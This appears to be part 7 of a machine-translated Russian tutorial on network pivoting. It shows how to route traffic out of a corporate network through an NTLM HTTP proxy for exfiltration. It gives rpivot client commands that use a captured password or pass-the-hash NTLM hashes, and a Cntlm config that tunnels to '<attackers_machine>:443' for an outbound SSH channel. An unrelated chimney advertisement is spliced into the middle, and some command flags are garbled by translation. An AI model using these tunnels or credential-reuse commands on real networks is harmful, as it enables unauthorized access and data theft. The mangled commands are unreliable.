Руководство по pivoting. Часть 7

Корпоративный HTTP-прокси как путь для выхода
HTTP-прокси организации предоставляют места для своих сотрудников, чтобы получить доступ к внешним веб-приложений, что представляет хорошую возможность ексфильтрации, чтобы вы могли получили правильные учетные данные;)
Rpivot
Мы уже упоминали этот инструмент в разделе NAT-обхода. Он также поддерживает подключение к внешнему миру через NTLM HTTP-прокси. Команда на стороне сервера остается неизменной, используйте команду на сторону клиента следующим образом:
python client.py —server-ip <rpivot_server_ip> —server-port 9999\
—ntlm-proxy-ip <proxy_ip> —ntlm-proxy-port 8080 —domain CONTOSO.COM\
—username Alice —пароль P@ssw0rd
Или, если у вас есть LM: NT хэши вместо пароля:
python client.py —server-ip <rpivot_server_ip>\
—server-port 9999 —ntlm-proxy-ip <proxy_ip> —ntlm-proxy-port 8080 —domain CONTOSO.COM\
—username Alice —hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
Cntlm
Cntlm является инструментом выбора для запуска программ, которые не знают прокси через NTLM-прокси. В основном, этот инструмент выполняет проверку подлинности прокси и связывает порт локально, который направляется на внешнюю службу, которую указываете.

Кстати, лучшие дымоходы из нержавеющей стали вы найдете на rozavetrov.ua по самым низким ценам.

Связаный порт не требует аутентификации, поэтому можете использовать свои инструменты непосредственно (soks/SSH, например). Он использует для работы конфигурационный файл. Вот скелетная пример конфигурации для пересылки 443 порту (это порт, скорее всего, будет разрешено через прокси-сервер):
Username Alice
Пароль P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Запустите его:
cntlm.exe -c config.conf
Или, если вы на Linux:
./cntlm -c config.conf

Теперь у вас запущен ssh на удаленном хосте на порту 443 и можете запустить SSH-клиента (openssh/putty) и подключиться к локальному порту 2222, чтобы получить доступ к внешней машины.